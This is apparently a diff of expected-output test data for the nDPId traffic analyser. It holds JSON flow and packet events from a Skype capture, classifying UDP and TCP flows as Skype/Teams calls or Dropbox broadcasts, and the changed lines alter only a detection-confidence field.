00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":537,"source":"skype.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"skype.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1431969656410,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969656410,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1zB8AAEARzPbAqAEinTeCoDLdnF0AIXcUm7gCbIFVwo6Azkv+1yCNquXcTTuKbOiUHg=="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":537,"source":"skype.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":537,"source":"skype.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656652,"flow_last_seen":1431969656652,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969656652,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01121{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1431969656652,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969656652,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAISRnsAAEARcJbAqAEi\/\/\/\/\/0RcRFwB\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"} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656652,"flow_last_seen":1431969656652,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969656652,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656652,"flow_last_seen":1431969656652,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969656652,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":540,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656652,"flow_last_seen":1431969656652,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969656652,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01117{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1431969656652,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969656652,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAISynkAAEARKfDAqAEiwKgB\/0RcRFwB\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"} 
-00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656652,"flow_last_seen":1431969656652,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969656652,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656652,"flow_last_seen":1431969656652,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969656652,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657029,"flow_last_seen":1431969657029,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969657029,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01121{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1431969657029,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969657029,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISvf0AAEAR+NnAqAFc\/\/\/\/\/0RcRFwB\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"} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":541,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657029,"flow_last_seen":1431969657029,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969657029,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":541,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657029,"flow_last_seen":1431969657029,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969657029,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":542,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657029,"flow_last_seen":1431969657029,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969657029,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01117{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1431969657029,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969657029,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISJhIAAEARzh3AqAFcwKgB\/0RcRFwB\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"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657029,"flow_last_seen":1431969657029,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969657029,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657029,"flow_last_seen":1431969657029,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969657029,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50032,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAABAGANAAEAGj4bAqAEinTg0LMNwnGCx3l8+AAAAALAC\/\/8vJgAAAgQFtAEDAwUBAQgKPiLFlwAAAAAEAgAA"} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50033,"dst_port":40015,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -197,19 +197,19 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwhRAAEAGlxXAqAEinTeCjMNynGH\/hzWiAAAAALAC\/\/+8tgAAAgQFtAEDAwUBAQgKPiLFlwAAAAAEAgAA"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":546,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/NlsAAEARxRrAqAEib91NkTLdnFsAK6mBm7oCyq7Iy7cmxwvThWDRoZOMl0+28C1BuPbRnMjSw2j4JUc="} 
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":547,"source":"skype.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"skype.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAAA27UQAAEARdBjAqAEiQAQXjDLdnEwAIlR2m7wC9vRcAIihDfXYF+Nv6Z8h\/1gxupEorwc="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"skype.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"skype.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":548,"source":"skype.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":548,"source":"skype.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4fm8AAEAR4uHAqAEiQAQXljLdnEQAJKG2m74ChlnucS6od9D4320Ts5x3xY96lsRHLX7REg=="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"skype.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"skype.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":549,"source":"skype.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969657368,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":549,"source":"skype.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1431969657368,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969657368,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0lqwAAEARaEzAqAEib91KGTLdnFwAIDPbm8ACFZDv7jAw6LF020D2sIW\/RLlBE6QH"} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"skype.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969657368,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"skype.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969657368,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":550,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969657368,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.153","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":550,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1431969657368,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969657368,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5GS4AAEAR4kXAqAEib91NmTLdnFgAJQIPm8ICkS16B313b791pcC\/iQ60uf4KWNmYdYf5eCQ="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969657368,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.153","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969657368,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.153","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1431969657498,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969657498,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYi6dN4KMwKgBIpxhw3JnDsNv\/4c1o6ASOJAm+AAAAgQFrAQCCApOvfTqPiLFlwEDAwk="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1431969657498,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969657498,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0z75AAEAGiXfAqAEinTeCjMNynGH\/hzWjZw7DcIAQECx9oAAAAQEICj4ixhlOvfTq"} 